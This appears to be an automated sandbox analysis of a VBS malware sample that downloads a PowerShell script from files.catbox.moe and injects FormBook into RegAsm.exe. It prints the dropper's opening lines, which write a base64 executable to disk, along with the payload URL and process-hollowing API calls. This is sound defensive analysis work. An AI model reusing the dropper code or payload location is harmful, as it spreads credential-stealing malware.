                                                      Dec 18, 2024 13:37:44.178582907 CET44349701108.181.20.35192.168.2.7
                                                      Dec 18, 2024 13:37:44.178690910 CET49701443192.168.2.7108.181.20.35
                                                      Dec 18, 2024 13:37:44.178710938 CET44349701108.181.20.35192.168.2.7
                                                      Dec 18, 2024 13:37:44.178755999 CET49701443192.168.2.7108.181.20.35
                                                      Dec 18, 2024 13:37:44.185884953 CET44349701108.181.20.35192.168.2.7
                                                      Dec 18, 2024 13:37:44.185910940 CET44349701108.181.20.35192.168.2.7
                                                      Dec 18, 2024 13:37:44.186019897 CET49701443192.168.2.7108.181.20.35
                                                      Dec 18, 2024 13:37:44.186038971 CET44349701108.181.20.35192.168.2.7
                                                      Dec 18, 2024 13:37:44.186079979 CET49701443192.168.2.7108.181.20.35
                                                      Dec 18, 2024 13:37:44.193558931 CET44349701108.181.20.35192.168.2.7
                                                      Dec 18, 2024 13:37:44.193594933 CET44349701108.181.20.35192.168.2.7
                                                      Dec 18, 2024 13:37:44.193758011 CET49701443192.168.2.7108.181.20.35
                                                      Dec 18, 2024 13:37:44.193778992 CET44349701108.181.20.35192.168.2.7
                                                      Dec 18, 2024 13:37:44.193833113 CET49701443192.168.2.7108.181.20.35
                                                      Dec 18, 2024 13:37:44.199322939 CET44349701108.181.20.35192.168.2.7
                                                      Dec 18, 2024 13:37:44.199350119 CET44349701108.181.20.35192.168.2.7
                                                      Dec 18, 2024 13:37:44.199454069 CET49701443192.168.2.7108.181.20.35
                                                      Dec 18, 2024 13:37:44.199471951 CET44349701108.181.20.35192.168.2.7
                                                      Dec 18, 2024 13:37:44.199538946 CET49701443192.168.2.7108.181.20.35
                                                      Dec 18, 2024 13:37:44.207233906 CET44349701108.181.20.35192.168.2.7
                                                      Dec 18, 2024 13:37:44.207263947 CET44349701108.181.20.35192.168.2.7
                                                      Dec 18, 2024 13:37:44.207354069 CET49701443192.168.2.7108.181.20.35
                                                      Dec 18, 2024 13:37:44.207377911 CET44349701108.181.20.35192.168.2.7
                                                      Dec 18, 2024 13:37:44.207421064 CET49701443192.168.2.7108.181.20.35
                                                      Dec 18, 2024 13:37:44.214303970 CET44349701108.181.20.35192.168.2.7
                                                      Dec 18, 2024 13:37:44.214333057 CET44349701108.181.20.35192.168.2.7
                                                      Dec 18, 2024 13:37:44.214428902 CET49701443192.168.2.7108.181.20.35
                                                      Dec 18, 2024 13:37:44.214448929 CET44349701108.181.20.35192.168.2.7
                                                      Dec 18, 2024 13:37:44.214497089 CET49701443192.168.2.7108.181.20.35
                                                      Dec 18, 2024 13:37:44.235683918 CET44349701108.181.20.35192.168.2.7
                                                      Dec 18, 2024 13:37:44.235709906 CET44349701108.181.20.35192.168.2.7
                                                      Dec 18, 2024 13:37:44.235842943 CET49701443192.168.2.7108.181.20.35
                                                      Dec 18, 2024 13:37:44.235860109 CET44349701108.181.20.35192.168.2.7
                                                      Dec 18, 2024 13:37:44.235897064 CET49701443192.168.2.7108.181.20.35
                                                      Dec 18, 2024 13:37:44.363070965 CET44349701108.181.20.35192.168.2.7
                                                      Dec 18, 2024 13:37:44.363096952 CET44349701108.181.20.35192.168.2.7
                                                      Dec 18, 2024 13:37:44.363183022 CET49701443192.168.2.7108.181.20.35
                                                      Dec 18, 2024 13:37:44.363202095 CET44349701108.181.20.35192.168.2.7
                                                      Dec 18, 2024 13:37:44.363239050 CET49701443192.168.2.7108.181.20.35
                                                      Dec 18, 2024 13:37:44.370313883 CET44349701108.181.20.35192.168.2.7
                                                      Dec 18, 2024 13:37:44.370338917 CET44349701108.181.20.35192.168.2.7
                                                      Dec 18, 2024 13:37:44.370450020 CET49701443192.168.2.7108.181.20.35
                                                      Dec 18, 2024 13:37:44.370470047 CET44349701108.181.20.35192.168.2.7
                                                      Dec 18, 2024 13:37:44.370512009 CET49701443192.168.2.7108.181.20.35
                                                      Dec 18, 2024 13:37:44.377794981 CET44349701108.181.20.35192.168.2.7
                                                      Dec 18, 2024 13:37:44.377823114 CET44349701108.181.20.35192.168.2.7
                                                      Dec 18, 2024 13:37:44.377923012 CET49701443192.168.2.7108.181.20.35
                                                      Dec 18, 2024 13:37:44.377940893 CET44349701108.181.20.35192.168.2.7
                                                      Dec 18, 2024 13:37:44.377983093 CET49701443192.168.2.7108.181.20.35
                                                      Dec 18, 2024 13:37:44.384233952 CET44349701108.181.20.35192.168.2.7
                                                      Dec 18, 2024 13:37:44.384258032 CET44349701108.181.20.35192.168.2.7
                                                      Dec 18, 2024 13:37:44.384310961 CET49701443192.168.2.7108.181.20.35
                                                      Dec 18, 2024 13:37:44.384330988 CET44349701108.181.20.35192.168.2.7
                                                      Dec 18, 2024 13:37:44.384363890 CET49701443192.168.2.7108.181.20.35
                                                      Dec 18, 2024 13:37:44.384402990 CET49701443192.168.2.7108.181.20.35
                                                      Dec 18, 2024 13:37:44.391267061 CET44349701108.181.20.35192.168.2.7
                                                      Dec 18, 2024 13:37:44.391298056 CET44349701108.181.20.35192.168.2.7
                                                      Dec 18, 2024 13:37:44.391355038 CET49701443192.168.2.7108.181.20.35
                                                      Dec 18, 2024 13:37:44.391377926 CET44349701108.181.20.35192.168.2.7
                                                      Dec 18, 2024 13:37:44.391482115 CET49701443192.168.2.7108.181.20.35
                                                      Dec 18, 2024 13:37:44.399653912 CET44349701108.181.20.35192.168.2.7
                                                      Dec 18, 2024 13:37:44.399684906 CET44349701108.181.20.35192.168.2.7
                                                      Dec 18, 2024 13:37:44.399753094 CET49701443192.168.2.7108.181.20.35
                                                      Dec 18, 2024 13:37:44.399775028 CET44349701108.181.20.35192.168.2.7
                                                      Dec 18, 2024 13:37:44.399816990 CET49701443192.168.2.7108.181.20.35
                                                      Dec 18, 2024 13:37:44.406443119 CET44349701108.181.20.35192.168.2.7
                                                      Dec 18, 2024 13:37:44.406472921 CET44349701108.181.20.35192.168.2.7
                                                      Dec 18, 2024 13:37:44.406635046 CET49701443192.168.2.7108.181.20.35
                                                      Dec 18, 2024 13:37:44.406653881 CET44349701108.181.20.35192.168.2.7
                                                      Dec 18, 2024 13:37:44.406719923 CET49701443192.168.2.7108.181.20.35
                                                      Dec 18, 2024 13:37:44.549247980 CET44349701108.181.20.35192.168.2.7
                                                      Dec 18, 2024 13:37:44.549272060 CET44349701108.181.20.35192.168.2.7
                                                      Dec 18, 2024 13:37:44.549408913 CET49701443192.168.2.7108.181.20.35
                                                      Dec 18, 2024 13:37:44.549427986 CET44349701108.181.20.35192.168.2.7
                                                      Dec 18, 2024 13:37:44.549487114 CET49701443192.168.2.7108.181.20.35
                                                      Dec 18, 2024 13:37:44.556341887 CET44349701108.181.20.35192.168.2.7
                                                      Dec 18, 2024 13:37:44.556368113 CET44349701108.181.20.35192.168.2.7
                                                      Dec 18, 2024 13:37:44.556569099 CET49701443192.168.2.7108.181.20.35
                                                      Dec 18, 2024 13:37:44.556583881 CET44349701108.181.20.35192.168.2.7
                                                      Dec 18, 2024 13:37:44.556619883 CET49701443192.168.2.7108.181.20.35
                                                      Dec 18, 2024 13:37:44.563282967 CET44349701108.181.20.35192.168.2.7
                                                      Dec 18, 2024 13:37:44.563308954 CET44349701108.181.20.35192.168.2.7
                                                      Dec 18, 2024 13:37:44.563433886 CET49701443192.168.2.7108.181.20.35
                                                      Dec 18, 2024 13:37:44.563452959 CET44349701108.181.20.35192.168.2.7
                                                      Dec 18, 2024 13:37:44.563510895 CET49701443192.168.2.7108.181.20.35
                                                      Dec 18, 2024 13:37:44.569472075 CET44349701108.181.20.35192.168.2.7
                                                      Dec 18, 2024 13:37:44.569499016 CET44349701108.181.20.35192.168.2.7
                                                      Dec 18, 2024 13:37:44.569721937 CET49701443192.168.2.7108.181.20.35
                                                      Dec 18, 2024 13:37:44.569739103 CET44349701108.181.20.35192.168.2.7
                                                      Dec 18, 2024 13:37:44.569785118 CET49701443192.168.2.7108.181.20.35
                                                      Dec 18, 2024 13:37:44.571321964 CET44349701108.181.20.35192.168.2.7
                                                      Dec 18, 2024 13:37:44.571388960 CET44349701108.181.20.35192.168.2.7
                                                      Dec 18, 2024 13:37:44.571397066 CET49701443192.168.2.7108.181.20.35
                                                      Dec 18, 2024 13:37:44.571439981 CET49701443192.168.2.7108.181.20.35
                                                      Dec 18, 2024 13:37:44.571563959 CET49701443192.168.2.7108.181.20.35
                                                      Dec 18, 2024 13:37:44.571577072 CET44349701108.181.20.35192.168.2.7
                                                      Dec 18, 2024 13:37:44.571599960 CET49701443192.168.2.7108.181.20.35
                                                      Dec 18, 2024 13:37:44.571624041 CET49701443192.168.2.7108.181.20.35
                                                      Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                      Dec 18, 2024 13:37:39.784214020 CET | 58468 | 53 | 192.168.2.7 | 1.1.1.1
                                                      Dec 18, 2024 13:37:40.131613970 CET | 53 | 58468 | 1.1.1.1 | 192.168.2.7

                                                      Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                                                      Dec 18, 2024 13:37:39.784214020 CET | 192.168.2.7 | 1.1.1.1 | 0xfab0 | Standard query (0) | files.catbox.moe | A (IP address) | IN (0x0001) | false

                                                      Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                                                      Dec 18, 2024 13:37:40.131613970 CET | 1.1.1.1 | 192.168.2.7 | 0xfab0 | No error (0) | files.catbox.moe | | 108.181.20.35 | A (IP address) | IN (0x0001) | false

                                                      • files.catbox.moe

                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      0 | 192.168.2.7 | 49701 | 108.181.20.35 | 443 | 7424 | C:\Windows\System32\wscript.exe

                                                      Timestamp | Bytes transferred | Direction | Data
                                                      2024-12-18 12:37:42 UTC | 330 | OUT | GET /q8ynky.ps1 HTTP/1.1
                                                      Accept: */*
                                                      Accept-Language: en-ch
                                                      UA-CPU: AMD64
                                                      Accept-Encoding: gzip, deflate
                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                      Host: files.catbox.moe
                                                      Connection: Keep-Alive
                                                      2024-12-18 12:37:42 UTC | 552 | IN | HTTP/1.1 200 OK
                                                      Server: nginx
                                                      Date: Wed, 18 Dec 2024 12:37:42 GMT
                                                      Content-Type: application/octet-stream
                                                      Content-Length: 1035728
                                                      Last-Modified: Tue, 17 Dec 2024 22:01:01 GMT
                                                      Connection: close
                                                      ETag: "6761f49d-fcdd0"
                                                      X-Content-Type-Options: nosniff
                                                      Content-Security-Policy: default-src 'self' https://files.catbox.moe; style-src https://files.catbox.moe 'unsafe-inline'; img-src 'self' data:; font-src 'self'; media-src 'self'; object-src 'self';
                                                      Access-Control-Allow-Origin: *
                                                      Access-Control-Allow-Methods: GET, HEAD
                                                      Accept-Ranges: bytes
                                                      2024-12-18 12:37:42 UTC | 15832 | IN | Data Ascii:
                                                      $p=[IO.Path]::Combine($env:TEMP,"x.exe")
                                                      [IO.File]::WriteAllBytes($p,[Convert]::FromBase64String("TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUu

                                                      Target ID:0
                                                      Start time:07:37:37
                                                      Start date:18/12/2024
                                                      Path:C:\Windows\System32\wscript.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\z68scancopy.vbs"
                                                      Imagebase:0x7ff607ec0000
                                                      File size:170'496 bytes
                                                      MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      Target ID:4
                                                      Start time:07:37:43
                                                      Start date:18/12/2024
                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy RemoteSigned -File "C:\Temp\dddddd.ps1"
                                                      Imagebase:0x7ff741d30000
                                                      File size:452'608 bytes
                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      Target ID:5
                                                      Start time:07:37:43
                                                      Start date:18/12/2024
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff75da10000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      Target ID:6
                                                      Start time:07:37:47
                                                      Start date:18/12/2024
                                                      Path:C:\Users\user\AppData\Local\Temp\x.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Users\user~1\AppData\Local\Temp\x.exe"
                                                      Imagebase:0x460000
                                                      File size:776'704 bytes
                                                      MD5 hash:68FC317E2CC6A7B69F76B9D8DDEC0C79
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Antivirus matches:
                                                      • Detection: 100%, Avira
                                                      • Detection: 100%, Joe Sandbox ML
                                                      Reputation:low
                                                      Has exited:true

                                                      Target ID:7
                                                      Start time:07:37:47
                                                      Start date:18/12/2024
                                                      Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                      Imagebase:0x8f0000
                                                      File size:65'440 bytes
                                                      MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.1720004612.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.1720694148.0000000000E50000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                      Reputation:high
                                                      Has exited:true

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.1447765577.00007FFAAB510000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB510000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_7ffaab510000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: r63$r63
                                                        • API String ID: 0-2640113253
                                                        • Opcode ID: 122c21025db296c62edffe711f4d0c26e1b7ada59a8d2be4f5dbae0d538ec666
                                                        • Instruction ID: 20355bdb22edcc9c44ab29ed2ec2071a7208cef45dc2986c6cd3fc5c5112288d
                                                        • Opcode Fuzzy Hash: 122c21025db296c62edffe711f4d0c26e1b7ada59a8d2be4f5dbae0d538ec666
                                                        • Instruction Fuzzy Hash: AD924762A4EBC68FE796A728A8255747FE5EF57250B0C40FBD04ECB0B3D9189C09C391
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.1447765577.00007FFAAB510000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB510000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_7ffaab510000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: r63$r63
                                                        • API String ID: 0-2640113253
                                                        • Opcode ID: 39b7ccbebfb3194a0f67aab362961a159e8130aa133f20eb23bd83f0de2494ff
                                                        • Instruction ID: bde7098d205932e2dda24b176843e3faca2b0bf7861c514483f40f34ba70ff2b
                                                        • Opcode Fuzzy Hash: 39b7ccbebfb3194a0f67aab362961a159e8130aa133f20eb23bd83f0de2494ff
                                                        • Instruction Fuzzy Hash: 4311EB22E5E907DBF6E8B70874561B922C5EF96390F5C8179E80FC21F7DE08AC0545C1
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.1447347176.00007FFAAB440000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB440000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_7ffaab440000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                        • Instruction ID: 5b19ad272d9732cf16a905d4989d8dfae199ea890a714681719d8e606c14bd51
                                                        • Opcode Fuzzy Hash: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                        • Instruction Fuzzy Hash: 8D01A77111CB0C8FD744EF0CE051AA6B7E0FB85364F10056DE58AC3661DA32E882CB41
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.1447347176.00007FFAAB440000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB440000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_7ffaab440000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: (0P$8,P$P/P$p0P$-P$/P
                                                        • API String ID: 0-2909572849
                                                        • Opcode ID: c8a6d61b67c8fbea86baf81c2592e85161dd96e47b1a28f7a7701a1b6cee3fa0
                                                        • Instruction ID: a91d09deceed1ff0fd854110e4ca47f39f1622b7c0d4d7fa55e5f7c99c77704e
                                                        • Opcode Fuzzy Hash: c8a6d61b67c8fbea86baf81c2592e85161dd96e47b1a28f7a7701a1b6cee3fa0
                                                        • Instruction Fuzzy Hash: CF31844390F7D14FE3168BA85C250A86FA4EF93290B1984FBD0CDDA6EB98149D2D83D1

                                                        Execution Graph

                                                        Execution Coverage:43%
                                                        Dynamic/Decrypted Code Coverage:100%
                                                        Signature Coverage:0%
                                                        Total number of Nodes:79
                                                        Total number of Limit Nodes:4


                                                        Control-flow Graph

                                                        APIs
                                                        • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 027911E9
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.1398148862.0000000002790000.00000040.00000800.00020000.00000000.sdmp, Offset: 02790000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_2790000_x.jbxd
                                                        Similarity
                                                        • API ID: CreateProcess
                                                        • String ID:
                                                        • API String ID: 963392458-0
                                                        • Opcode ID: 5d4b3f46f723baa4bf87106cad74803ed1bf236917f2fb208a96630998336eb5
                                                        • Instruction ID: 2f3b03c9498ba556fe8d5e9a0d2325c1dec50975cd0e7e9876331b54ab4a80b9
                                                        • Opcode Fuzzy Hash: 5d4b3f46f723baa4bf87106cad74803ed1bf236917f2fb208a96630998336eb5
                                                        • Instruction Fuzzy Hash: D3A16C71E0035A9FEF20DFA8D8417EEBBF2AB48314F148169E818E7280D7759995CF91

                                                        Control-flow Graph

                                                        APIs
                                                        • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 027911E9
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.1398148862.0000000002790000.00000040.00000800.00020000.00000000.sdmp, Offset: 02790000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_2790000_x.jbxd
                                                        Similarity
                                                        • API ID: CreateProcess
                                                        • String ID:
                                                        • API String ID: 963392458-0
                                                        • Opcode ID: eb37d438e7ddd1fbdcb986f03ede3b87978a86039684c41d24e0541ae278036f
                                                        • Instruction ID: 2b1813a4a9f6cbf60d83948901ffd7c0438d44334d03aee87dc7640931a92b36
                                                        • Opcode Fuzzy Hash: eb37d438e7ddd1fbdcb986f03ede3b87978a86039684c41d24e0541ae278036f
                                                        • Instruction Fuzzy Hash: 86A16C71E0035A9FEF20DFA8D8417EEBBF2AB48304F108169E818E7280D7759995CF91

                                                        Control-flow Graph

                                                        APIs
                                                        • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0279186D
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.1398148862.0000000002790000.00000040.00000800.00020000.00000000.sdmp, Offset: 02790000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_2790000_x.jbxd
                                                        Similarity
                                                        • API ID: MemoryProcessWrite
                                                        • String ID:
                                                        • API String ID: 3559483778-0
                                                        • Opcode ID: ac77d3cc1943a6c170095da307c0c6f371566a392bf3098bdfc294276ba0bca8
                                                        • Instruction ID: 7b51d9fa1ae4b570ec0798e6ebc99294ad400b59a05fe9590d809d6d16aa084c
                                                        • Opcode Fuzzy Hash: ac77d3cc1943a6c170095da307c0c6f371566a392bf3098bdfc294276ba0bca8
                                                        • Instruction Fuzzy Hash: 8061C371A0031A9FCB15CFA8D891AEFBBF2FF88310F548569D8099B345DB349905CBA4

                                                        Control-flow Graph

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.1398148862.0000000002790000.00000040.00000800.00020000.00000000.sdmp, Offset: 02790000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_2790000_x.jbxd
                                                        Similarity
                                                        • API ID: ResumeThread
                                                        • String ID:
                                                        • API String ID: 947044025-0
                                                        • Opcode ID: 7a82313c4c1602debcb006efbdad195c58c1f6d97297c8c51d6db45dda53f30d
                                                        • Instruction ID: 752ae8d12ef044e6fbbda876275fb33ef3506d78faa96be92cb287af8398d7ea
                                                        • Opcode Fuzzy Hash: 7a82313c4c1602debcb006efbdad195c58c1f6d97297c8c51d6db45dda53f30d
                                                        • Instruction Fuzzy Hash: 4151B371A003098FDB25DBA9E454BAEBBF2EFC4210F148459D519DB395DB349C02CBA9

                                                        Control-flow Graph

                                                        APIs
                                                        • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 02791437
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.1398148862.0000000002790000.00000040.00000800.00020000.00000000.sdmp, Offset: 02790000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_2790000_x.jbxd
                                                        Similarity
                                                        • API ID: ContextThreadWow64
                                                        • String ID:
                                                        • API String ID: 983334009-0
                                                        • Opcode ID: e02b093d7ff527240cb3b529e9ed3fc41f1fcc49d379e3e475e33319870da873
                                                        • Instruction ID: b0f4fba019cf9c1e332b31345539e926673497c2405ec2da8aa960179d8a1b5e
                                                        • Opcode Fuzzy Hash: e02b093d7ff527240cb3b529e9ed3fc41f1fcc49d379e3e475e33319870da873
                                                        • Instruction Fuzzy Hash: AE41DF31A0035A8FCB11DBA9D4557AEBBF1FF49220F1580AAC848EB351D7389846CBA1

                                                        Control-flow Graph

                                                        APIs
                                                        • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 02791633
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.1398148862.0000000002790000.00000040.00000800.00020000.00000000.sdmp, Offset: 02790000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_2790000_x.jbxd
                                                        Similarity
                                                        • API ID: AllocVirtual
                                                        • String ID:
                                                        • API String ID: 4275171209-0
                                                        • Opcode ID: 998cf186b3279195d9cddab5678d0d8b5a96c055bec5c45e2a650910ee85881e
                                                        • Instruction ID: 8d522d767520ba291dd1e6c1f1ec8baecd1d98edea2722ea42e64332acb58a2d
                                                        • Opcode Fuzzy Hash: 998cf186b3279195d9cddab5678d0d8b5a96c055bec5c45e2a650910ee85881e
                                                        • Instruction Fuzzy Hash: 6431C471A003489FDB21DFA9D881BEEBFF5EF89320F248459D918E7251C7359846CBA4

                                                        Control-flow Graph

                                                        APIs
                                                        • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0279186D
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.1398148862.0000000002790000.00000040.00000800.00020000.00000000.sdmp, Offset: 02790000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_2790000_x.jbxd
                                                        Similarity
                                                        • API ID: MemoryProcessWrite
                                                        • String ID:
                                                        • API String ID: 3559483778-0

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 240 27905b4-2791514 ReadProcessMemory 243 279151d-2791545 240->243 244 2791516-279151c 240->244 244->243
                                                        APIs
                                                        • ReadProcessMemory.KERNELBASE(027DB7C8,?,?,?,?), ref: 02791507
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.1398148862.0000000002790000.00000040.00000800.00020000.00000000.sdmp, Offset: 02790000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_2790000_x.jbxd
                                                        Similarity
                                                        • API ID: MemoryProcessRead
                                                        • String ID:
                                                        • API String ID: 1726664587-0

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 247 2791480-2791514 ReadProcessMemory 249 279151d-2791545 247->249 250 2791516-279151c 247->250 250->249
                                                        APIs
                                                        • ReadProcessMemory.KERNELBASE(027DB7C8,?,?,?,?), ref: 02791507
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.1398148862.0000000002790000.00000040.00000800.00020000.00000000.sdmp, Offset: 02790000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_2790000_x.jbxd
                                                        Similarity
                                                        • API ID: MemoryProcessRead
                                                        • String ID:
                                                        • API String ID: 1726664587-0

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 253 27913c0-279140c 255 2791418-2791421 253->255 256 279140e-2791416 253->256 257 2791422-2791444 Wow64SetThreadContext 255->257 256->255 258 279144d-2791475 257->258 259 2791446-279144c 257->259 259->258
                                                        APIs
                                                        • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 02791437
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.1398148862.0000000002790000.00000040.00000800.00020000.00000000.sdmp, Offset: 02790000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_2790000_x.jbxd
                                                        Similarity
                                                        • API ID: ContextThreadWow64
                                                        • String ID:
                                                        • API String ID: 983334009-0

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 262 27915c8-2791603 263 279160b-2791640 VirtualAllocEx 262->263 264 2791649-2791666 263->264 265 2791642-2791648 263->265 265->264
                                                        APIs
                                                        • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 02791633
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.1398148862.0000000002790000.00000040.00000800.00020000.00000000.sdmp, Offset: 02790000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_2790000_x.jbxd
                                                        Similarity
                                                        • API ID: AllocVirtual
                                                        • String ID:
                                                        • API String ID: 4275171209-0

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 268 27919f8-2791a64 ResumeThread 270 2791a6d-2791a8a 268->270 271 2791a66-2791a6c 268->271 271->270
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.1398148862.0000000002790000.00000040.00000800.00020000.00000000.sdmp, Offset: 02790000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_2790000_x.jbxd
                                                        Similarity
                                                        • API ID: ResumeThread
                                                        • String ID:
                                                        • API String ID: 947044025-0

                                                        Execution Graph

                                                        Execution Coverage:0.9%
                                                        Dynamic/Decrypted Code Coverage:5.3%
                                                        Signature Coverage:9.6%
                                                        Total number of Nodes:94
                                                        Total number of Limit Nodes:8

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 21 417713-41773c call 42f283 24 417742-417750 call 42f883 21->24 25 41773e-417741 21->25 28 417760-417771 call 42dd33 24->28 29 417752-41775d call 42fb23 24->29 34 417773-417787 LdrLoadDll 28->34 35 41778a-41778d 28->35 29->28 34->35
                                                        APIs
                                                        • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417785
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1720004612.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Load
                                                        • String ID:
                                                        • API String ID: 2234796835-0

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 41 42c5e3-42c61c call 404793 call 42d833 NtClose
                                                        APIs
                                                        • NtClose.NTDLL(?,?,00000000,00000000,0000001F,?,FA0A1F00), ref: 0042C617
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1720004612.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
